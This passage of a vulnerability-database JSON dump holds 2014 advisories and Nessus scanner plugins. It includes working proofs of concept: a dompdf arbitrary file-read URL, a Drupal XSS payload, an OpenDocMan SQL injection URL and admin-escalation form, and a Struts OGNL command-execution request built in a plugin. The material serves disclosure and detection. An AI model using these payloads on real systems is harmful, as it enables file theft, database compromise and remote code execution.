\r\nhttp://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30563", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30563", "title": "CVE-2014-2383 - Arbitrary file read in dompdf", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Unauthenticated access to sensitive information and\r\nfunctionality in Livetecs Timelive\r\nCVE: CVE-2014-1217\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.2.8\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was possible to access a URL that allowed unauthenticated access\r\nto sensitive configuration change functionality, and also revealed the\r\ndatabase connection\r\nstring (including authentication credentials) used by TimeLive to access\r\nthe database.\r\n\r\nThe following URL was identified:\r\nhttp://MyTimeLiveServer/home/systemsetting.aspx\r\n\r\nNote: This URL was identified by entering "timelive default credentials"\r\ninto the Google\r\nInternet search engine. At time of writing the URL was revealed by the\r\nfirst result returned\r\nby Google.\r\n\r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1217/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30562", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30562", "title": "CVE-2014-1217 - Unauthenticated access to sensitive information and functionality in Livetecs Timelive", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nVulnerability title: Cross-site scripting (XSS) vulnerability in Videowhisper\r\nCVE: CVE-2014-2715\r\nVendor: VideoWhisper\r\nProduct: Videowhisper module for Drupal 7\r\nAffected version: 7\r\nFixed version: \r\nReported by: Mahmoud Ghorbanzadeh\r\n\r\nDetails:\r\n\r\nHello,\r\nI found Cross-site scripting (XSS) vulnerability in the Videowhisper module for Drupal 7 (videowhisper-7.x). The vulnerability exist at line 2 and line 4 in drupal\modules\videowhisper\vwrooms\templates\logout.tpl.php due to $_GET['module'] and $_GET['message'] variables respectively at line 347 in drupal\modules\videowhisper\vwrooms\vwrooms.module.\r\n\r\nPOC: drupal/index.php?q=vwrooms/logout&module=<script>alert('XSS1')</script>&message=<script>alert('XSS2')</script>\r\n\r\nVendor Notification: 18, Apr 2014\r\n \r\nDiscovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.\r\n\r\nBest Regards.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30559", "title": "[CVE-2014-2715] Cross-site scripting (XSS) vulnerability in Videowhisper", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nCVE-2013-2251: Apache Continuum affected by Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Continuum 1.3.1 to Continuum 1.4.1\r\n\r\nDescription:\r\nApache Continuum is affected by a vulnerability in the version of the Struts library being used,\r\nwhich allows a malicious user to run code on the server remotely. More details about the vulnerability\r\ncan be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Continuum 1.4.2, which is not affected\r\nby this issue.\r\n\r\nReferences:\r\nhttp://continuum.apache.org/security.html\r\n\r\n\r\n", "modified": "2014-06-14T00:00:00", "published": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30825", "title": "[SECURITY] CVE-2013-2251: Apache Continuum affected by Remote Command Execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23202\r\nProduct: OpenDocMan\r\nVendor: Free Document Management Software\r\nVulnerable Version(s): 1.2.7 and probably prior\r\nTested Version: 1.2.7\r\nAdvisory Publication: February 12, 2014 [without technical details]\r\nVendor Notification: February 12, 2014 \r\nVendor Patch: February 24, 2014 \r\nPublic Disclosure: March 5, 2014 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]\r\nCVE References: CVE-2014-1945, CVE-2014-1946\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.\r\n\r\n\r\n1) SQL Injection in OpenDocMan: CVE-2014-1945\r\n\r\nThe vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe exploitation example below displays version of the MySQL server:\r\n\r\nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9\r\n\r\n\r\n2) Improper Access Control in OpenDocMan: CVE-2014-1946\r\n\r\nThe vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.\r\n\r\nThe exploitation example below assigns administrative privileges for the current account:\r\n\r\n<form action="http://[host]/signup.php" method="post" name="main">\r\n<input type="hidden" name="updateuser" value="1">\r\n<input type="hidden" name="admin" value="1">\r\n<input type="hidden" name="id" value="[USER_ID]">\r\n<input type="submit" name="login" value="Run">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to OpenDocMan v1.2.7.2\r\n\r\nMore Information:\r\nhttp://www.opendocman.com/opendocman-v1-2-7-1-release/\r\nhttp://www.opendocman.com/opendocman-v1-2-7-2-released/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.\r\n[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30587", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30587", "title": "Multiple Vulnerabilities in OpenDocMan", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "wpvulndb": [{"lastseen": "2018-09-17T19:26:06", "bulletinFamily": "software", "description": "WordPress Vulnerability - XCloner - Backup and Restore 3.1.0 - Multiple Actions CSRF\n", "modified": "2017-01-03T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:7154", "href": "https://wpvulndb.com/vulnerabilities/7154", "type": "wpvulndb", "title": "XCloner - Backup and Restore 3.1.0 - Multiple Actions CSRF", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-17T19:27:04", "bulletinFamily": "software", "description": "WordPress Vulnerability - VideoWhisper Live Streaming Integration 4.27.3 - Multiple Vulnerabilities\n", "modified": "2015-05-15T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6175", "href": "https://wpvulndb.com/vulnerabilities/6175", "type": "wpvulndb", "title": "VideoWhisper Live Streaming Integration 4.27.3 - Multiple Vulnerabilities", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-17T19:26:56", "bulletinFamily": "software", "description": "WordPress Vulnerability - AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection\n", "modified": "2015-05-15T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6597", "href": "https://wpvulndb.com/vulnerabilities/6597", "type": "wpvulndb", "title": "AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:18:19", "bulletinFamily": "scanner", "description": "According to its self-reported version, the instance of Apache Archiva\nhosted on the remote web server is 1.2.x prior than or equal to 1.2.2\nor 1.3.x prior than or equal to 1.3.6 and thus is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists related to\n unspecified scripts and unspecified parameters that\n could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled\n version of Apache Struts that could allow arbitrary\n Object-Graph Navigation Language (OGNL) expression\n execution via specially crafted requests.\n (CVE-2013-2251)", "modified": "2018-06-14T00:00:00", "published": "2014-04-29T00:00:00", "id": "ARCHIVA_1_3_8.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73761", "title": "Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73761);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2013-2187\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 66991, 66998);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n\n script_name(english:\"Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Archiva version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Apache Archiva\nhosted on the remote web server is 1.2.x prior than or equal to 1.2.2\nor 1.3.x prior than or equal to 1.3.6 and thus is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists related to\n unspecified scripts and unspecified parameters that\n could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled\n version of Apache Struts that could allow arbitrary\n Object-Graph Navigation Language (OGNL) expression\n execution via specially crafted requests.\n (CVE-2013-2251)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://archiva.apache.org/security.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://commons.apache.org/proper/commons-ognl/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache Archiva 1.3.8 / 2.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:archiva\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"archiva_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/archiva\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8080, embedded:FALSE);\n\ninstall = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\ninstall_url = build_url(port:port, qs:dir+'/index.action');\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Apache Archiva\", install_url);\n\nif (version !~ \"^1\\.[23]($|\\.)\") audit(AUDIT_WEB_APP_NOT_INST, \"Apache Archiva 1.2.x / 1.3.x\", port);\n\n# Affected (per NVD) :\n# 1.2.x <= 1.2.2\n# 1.3.x <= 1.3.6\n# Fixed (per vendor) :\n# 1.3.8\n# 2.0.1\nif (\n version =~ \"^1\\.2($|[^0-9.])\" ||\n version =~ \"^1\\.2\\.[012]($|[^0-9])\" ||\n version =~ \"^1\\.3($|[^0-9.])\" ||\n version =~ \"^1\\.3\\.[0-6]($|[^0-9])\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.8 / 2.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Apache Archiva\", install_url, version);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:18:26", "bulletinFamily": "scanner", "description": "According to its banner, the version of Bugzilla installed on the\nremote host is after version 2.0 but prior to 4.4.3 / 4.5.3. It is,\ntherefore, affected by a cross-site request forgery vulnerability.\n\nThe vulnerability exists with the login form and could allow a remote\nattacker to cause a user to login using the attacker's credentials,\nalerting the attacker of any bugs the user submits.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "modified": "2018-11-28T00:00:00", "published": "2014-05-20T00:00:00", "id": "BUGZILLA_LOGIN_XSRF.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74107", "title": "Bugzilla 2.0 < 4.4.3 / 4.5.3 Login Form XSRF", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74107);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n\n script_cve_id(\"CVE-2014-1517\");\n script_bugtraq_id(66984);\n\n script_name(english:\"Bugzilla 2.0 < 4.4.3 / 4.5.3 Login Form XSRF\");\n script_summary(english:\"Checks Bugzilla version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that suffers from a\ncross-site request forgery vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Bugzilla installed on the\nremote host is after version 2.0 but prior to 4.4.3 / 4.5.3. It is,\ntherefore, affected by a cross-site request forgery vulnerability.\n\nThe vulnerability exists with the login form and could allow a remote\nattacker to cause a user to login using the attacker's credentials,\nalerting the attacker of any bugs the user submits.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.bugzilla.org/security/4.0.11/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=713926\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Bugzilla 4.4.3 / 4.5.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:bugzilla\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bugzilla_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"installed_sw/Bugzilla\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = 'Bugzilla';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\n\ninstall_loc = build_url(port:port, qs:dir + \"/query.cgi\");\n\nif (version =~ \"^4($|[^0-9.])\")\n audit(AUDIT_VER_NOT_GRANULAR, app, port, version);\n\n# Versions less than 4.4.3 / 4.5.3 are vulnerable\nif (\n version =~ \"^[23]\\.\" ||\n version =~ \"^4\\.[0-3]([^0-9]|$)\" ||\n version =~ \"^4\\.(4|4\\.[0-2])([^0-9.]|$)\" ||\n version =~ \"^4\\.(5|5\\.[12])([^0-9.]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_loc+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 4.4.3 / 4.5.3\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-08T04:28:19", "bulletinFamily": "scanner", "description": "The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression\nprefixed by the 'action:' parameter, a remote, unauthenticated\nattacker can exploit this issue to execute arbitrary commands on the\nremote web server. An attacker can exploit the issue by sending a\nspecially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also\nreportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by\nan open redirect vulnerability; however, Nessus has not tested for\nthis additional issue.\n\nNote also that this plugin will only report the first vulnerable\ninstance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to\n1.3.6 are also affected by this issue as the application utilizes a\nvulnerable version of Struts 2.", "modified": "2019-02-07T00:00:00", "id": "STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68981", "published": "2013-07-19T00:00:00", "title": "Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68981);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2019/02/07 12:14:48\");\n\n script_cve_id(\"CVE-2013-2251\");\n script_bugtraq_id(61189);\n\n script_name(english:\"Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution\");\n script_summary(english:\"Attempts to execute arbitrary commands.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a web application that uses a Java\nframework, which is affected by a remote command execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression\nprefixed by the 'action:' parameter, a remote, unauthenticated\nattacker can exploit this issue to execute arbitrary commands on the\nremote web server. An attacker can exploit the issue by sending a\nspecially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also\nreportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by\nan open redirect vulnerability; however, Nessus has not tested for\nthis additional issue.\n\nNote also that this plugin will only report the first vulnerable\ninstance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to\n1.3.6 are also affected by this issue as the application utilizes a\nvulnerable version of Struts 2.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/527977/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 2.3.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"torture_cgi_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"?action:%25{(new+java.lang.ProcessBuilder(new\" +\n \"+java.lang.String[]{'\" +cmd+ \"'})).start()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/java\\.lang\\.\" +\n \"(UNIX)?Process(Impl)?@(.+)\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\n# Alternate attack that does not rely on 404 Error 